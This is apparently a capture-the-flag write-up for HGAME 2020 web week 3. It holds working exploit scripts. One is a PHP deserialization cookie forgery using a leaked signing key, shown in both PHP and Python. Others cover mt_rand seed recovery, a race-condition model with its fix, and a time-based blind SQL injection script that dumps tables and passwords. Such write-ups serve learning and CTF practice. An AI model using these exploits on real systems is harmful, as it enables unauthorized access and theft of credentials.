HGAME 2020 web week3 writeup

Ordinal Scale battle sequence

First grab source.zip to get the source code. To get the flag you need rank 1.

First look for a deserialization point: the constructor of the Monster class calls unserialize.

Then look for a place where rank can become 1. The destructor of the Rank class is where $_SESSION['rank'] gets written.

If we can satisfy $this->key === $this->serverKey, $_SESSION['rank'] is overwritten. So the first thing we know for certain is that the serialized object must be a Rank object with its $rank property set to 1.

So how do we satisfy $this->key === $this->serverKey? serverKey is assigned as $this->serverKey = $_SERVER['key'], so it is an unknown server-side value, and the key we control has to be strictly equal to it. The natural idea is to make key and serverKey always identical dynamically, i.e. $this->key = &$this->serverKey: after unserialize both properties share one value, so when the server assigns serverKey the write goes through the reference and key takes the same value, and the strict comparison passes. Note that key and serverKey are both private properties and cannot be accessed or modified from outside the class, so we just write a constructor inside our local copy of the class:

public function __construct(){
        $this->key = &$this->serverKey;   // key aliases serverKey: whatever the server assigns to serverKey, key holds too
}

After that we have to get past the constructor of the Monster class. The problem is that the $encryptKey property of the Monster object is unknown to us; if we knew its value we could build a cookie that passes the check. What is used here is a logic flaw: in the loop below $this->encryptKey is fed into a format string, so if we set $playername to %s, $this->encryptKey is printed straight back to us.

With $this->encryptKey known, the cookie construction can be reversed. The script is attached below; note that the registered username also takes part in the key calculation.

<?php
class Rank
{
    private $rank = 1;
    private $serverKey;     // the server's key, unknown to us
    private $key;
    public function __construct(){
        $this->key = &$this->serverKey;   // reference: key is always equal to serverKey
    }
}
$a = new Rank();
$leakedKey = 'gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL';   // Monster::$encryptKey, leaked with %s
$data = ['gappp', $leakedKey];                      // registered username first, then the leaked key
$encryptkey = '';
foreach($data as $value)
{
    $encryptkey .= md5($encryptkey.$value);         // chained md5, same as the server side
}
$key = md5(serialize($a).$encryptkey);              // signature over the serialized object
$end = base64_encode(serialize($a).$key);           // cookie = base64(payload . md5)
echo $end;

Just replace the cookie with this value.
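The same cookie built from Python, as an added example that is not part of the original writeup or the challenge code. It spells out the serialized form that the PHP script above produces (private property names carry NUL bytes, and the third property is emitted as the back-reference R:3; that aliases key to serverKey) and the chained-md5 signature. The player name and leaked key are the ones from the writeup; that the server checks the cookie as base64(payload . md5) is assumed from the PHP script, not confirmed from the challenge source.

```python
import base64
import hashlib


def php_private(cls, name):
    """serialize() name of a private member: "\0Class\0name"."""
    return f"\0{cls}\0{name}"


def php_str(s):
    return f's:{len(s.encode())}:"{s}";'


def serialize_rank(rank=1):
    """serialize() of a Rank whose key property is a reference (&) to serverKey.

    Slot numbering: the object is value #1, rank is #2, serverKey is #3, so the
    third property is written as R:3; instead of a value of its own.  After
    unserialize() both properties share one zval, so whatever the server later
    assigns to serverKey is also what key contains and === passes.
    """
    props = (
        php_str(php_private("Rank", "rank")) + f"i:{rank};",
        php_str(php_private("Rank", "serverKey")) + "N;",
        php_str(php_private("Rank", "key")) + "R:3;",
    )
    return f'O:4:"Rank":{len(props)}:{{' + "".join(props) + "}"


def md5hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def encrypt_key(player, leaked_key):
    """Chained md5 over [playername, encryptKey], mirroring the PHP script."""
    acc = ""
    for value in (player, leaked_key):
        acc += md5hex((acc + value).encode())
    return acc


def build_cookie(player, leaked_key, rank=1):
    payload = serialize_rank(rank)
    sig = md5hex((payload + encrypt_key(player, leaked_key)).encode())
    return base64.b64encode((payload + sig).encode()).decode()


def check_cookie(cookie, player, leaked_key):
    """Assumed server-side check: split off the trailing 32-char md5 and recompute it."""
    raw = base64.b64decode(cookie).decode()
    payload, sig = raw[:-32], raw[-32:]
    return sig == md5hex((payload + encrypt_key(player, leaked_key)).encode())


if __name__ == "__main__":
    # player name and leaked key from the writeup
    print(build_cookie("gappp", "gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL"))
```

Printing serialize_rank() before base64-encoding is the quickest way to see why the trick works: there is no key value in the payload at all, only a pointer to slot 3, so nothing we send has to match the server's secret.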

Two shots into the soul

I thought of getting the random seed with a seed brute-forcing script, but it didn't feel like there was enough time; reference:

https://www.anquanke.com/post/id/196831

In short, the seed can be computed from just the 0th and 227th generated random numbers instead of being brute-forced.
The script is attached directly:

import ast
import subprocess
import requests

s = requests.session()
cookie = {'PHPSESSID': '6s7cbsqbpjgn9l4883sgbovfu6'}

# fetch the first 228 outputs generated after the server's mt_srand()
url = "https://twoshot.hgame.n3ko.co/random.php?times=228"
c = s.get(url, cookies=cookie)
ans = ast.literal_eval(c.text.strip())   # the response is a list of numbers; literal_eval instead of eval
R0 = ans[0]
R227 = ans[227]

# reverse_mt_rand.py from the article above must be in the same directory;
# arguments: R0, R227, offset, flavour
proc = subprocess.run(['python', 'reverse_mt_rand.py', str(R0), str(R227), '0', '0'],
                      capture_output=True, text=True)
x = proc.stdout.replace('\n', '')

url2 = "https://twoshot.hgame.n3ko.co/verify.php"
data = {"ans": x}
final = s.post(url=url2, cookies=cookie, data=data)
print(final.text)

Remember to put the seed-recovery script (reverse_mt_rand.py) in the same directory as this script.

Cosmos secondary market

Race condition: use Burp Intruder with several threads, one buying low and one selling high at the same time. Buying at 100 while selling at 200 goes through, and so does buying at 50 while selling at 100.
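A minimal model of that race, as an added example; the shop logic is constructed by me, not taken from the challenge, only the prices (buy 100, sell 200) follow the writeup. A sell handler that checks the stock, does some slow work, then credits the balance and decrements the stock is a check-then-act bug: several concurrent sells of the same item all pass the check, exactly what the threaded Intruder run exploits. The fixed version holds a lock around the whole check-and-update (on a real site: one database transaction with SELECT ... FOR UPDATE or a conditional UPDATE).

```python
import threading
import time


class Market:
    """Toy shop: a balance and a stock count per item (constructed stand-in for the challenge)."""

    def __init__(self, balance, stock):
        self.balance = balance
        self.stock = dict(stock)
        self.lock = threading.Lock()

    def sell_racy(self, item, price):
        """Vulnerable: the stock check and the update are not atomic."""
        if self.stock.get(item, 0) > 0:          # time of check
            time.sleep(0.1)                       # DB round trip / rendering: the race window
            self.balance += price                 # time of use
            self.stock[item] -= 1
            return True
        return False

    def sell_safe(self, item, price):
        """Fixed: check and update run as one critical section."""
        with self.lock:
            if self.stock.get(item, 0) > 0:
                time.sleep(0.1)
                self.balance += price
                self.stock[item] -= 1
                return True
            return False


def race(sell, item, price, threads=8):
    """Fire `threads` sells at once, like Burp Intruder with several threads."""
    workers = [threading.Thread(target=sell, args=(item, price)) for _ in range(threads)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()


def demo(safe):
    """Buy one item at 100, then try to sell it 8 times at 200 simultaneously.

    Returns (balance, stock): the racy shop ends far above 100 with negative stock,
    the safe shop ends at exactly 100 with stock 0.
    """
    m = Market(balance=0, stock={"sword": 0})
    m.balance -= 100
    m.stock["sword"] += 1
    race(m.sell_safe if safe else m.sell_racy, "sword", 200)
    return m.balance, m.stock["sword"]


if __name__ == "__main__":
    print("racy:", demo(safe=False))
    print("safe:", demo(safe=True))
```

The sleep only makes the window wide enough to hit reliably from one process; against a real application the window is the server's own I/O, which is why sending the requests in parallel (Intruder threads, or Turbo Intruder) is enough.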

Cosmos message board 2

Registration filters out every character except alphanumerics. After logging in, the injection point is found in delete_id. There is no echo, so time-based blind injection is used. The script is attached directly; it dumps the table names, then the columns, then the username and password.

import requests
import time

cookie = {"PHPSESSID": "ps8l1kh75fac4kft6uumr02kot"}
base = "http://139.199.182.61:19999/index.php?method=delete&delete_id="

# No output from the query, so the true branch is told apart by a 5 second sleep().
# Payloads use parentheses instead of spaces; %3d is '=' and %23 is '#'.
# Step 1: table names; step 2: columns of `user`; step 3: the password column.
payload = "if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)%3ddatabase()),{pos},1))%3d{ch},sleep(5),1)%23"
#payload = "if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)%3d'user'),{pos},1))%3d{ch},sleep(5),1)%23"
#payload = "if(ascii(substr((select(group_concat(password))from(user)),{pos},1))%3d{ch},sleep(5),1)%23"

result = ""
for i in range(1, 50):
    print("testing position", i)
    for j in range(37, 127):
        url = base + payload.format(pos=i, ch=j)
        one_time = time.time()
        r = requests.get(url, cookies=cookie)
        #print(r.text)
        two_time = time.time()
        if two_time - one_time >= 5:        # the true branch slept: character found
            result = result + chr(j)
            print('answer:', result)
            break                           # next position

Cosmos chat rooms 2.0

Too weak: I didn't find the CSP point and don't know how the upload was bypassed, so I'll just faithfully reproduce the official writeup.


Origin blog.csdn.net/stepone4ward/article/details/104175014